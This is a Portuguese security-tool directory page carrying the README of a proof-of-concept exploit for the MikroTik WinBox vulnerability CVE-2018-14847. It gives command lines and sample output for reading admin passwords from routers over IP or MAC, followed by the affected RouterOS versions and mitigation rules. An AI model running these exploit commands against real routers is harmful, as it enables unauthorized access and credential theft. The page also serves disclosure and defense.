Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
winboxPOC — Prova de Conceito da Vulnerabilidade Crítica do Winbox (CVE-2018-14847) | Kitploit
Ferramentas/GitHubGitHub/tr33-he11/winboxpoc
ReconhecimentoAtaques de SenhaAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança de Rede
GitHubtr33-he11/winboxpoc

winboxPOC

Prova de Conceito da Vulnerabilidade Crítica do Winbox (CVE-2018-14847)

Ver Repositório
1há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

WinboxExploit

Este é uma prova de conceito da vulnerabilidade crítica do WinBox (CVE-2018-14847) que permite a leitura arbitrária de arquivos com senhas em texto puro.

Requisitos

  • Python 3+

Este script NÃO será executado com Python 2.x ou inferior.

Como Usar

O script é simples de usar, com argumentos simples na linha de comando.

WinBox (TCP/IP)

Explore a vulnerabilidade e leia a senha.

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

Exemplo:

root@kitploit:~
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord

MAC server WinBox (Camada 2)

Você pode extrair arquivos mesmo que o dispositivo não tenha um endereço IP.

Verificação simples de descoberta para dispositivos Mikrotik conectados localmente.

root@kitploit:~
python3 MACServerDiscover.py

Exemplo:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

Explore a vulnerabilidade e leia a senha.

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

Exemplo:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

Versões Vulneráveis

Todas as versões do RouterOS de 2015-05-28 a 2018-04-20 são vulneráveis a este exploit.

Dispositivos Mikrotik executando as versões do RouterOS:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

Para mais informações, consulte: https://blog.mikrotik.com/security/winbox-vulnerability.html

Técnicas de Mitigação

  • Atualize o roteador para uma versão do RouterOS que inclua a correção.
  • Desabilite o serviço WinBox no roteador.
  • Você pode restringir o acesso ao serviço WinBox a endereços IP específicos com o seguinte:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • Você pode usar algumas Regras de Filtro (ACL) para negar acesso externo ao serviço WinBox:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • A limitação de acesso ao serviço mac-winbox pode ser feita especificando as interfaces permitidas:
root@kitploit:~
/tool mac-server mac-winbox
Baixar ferramenta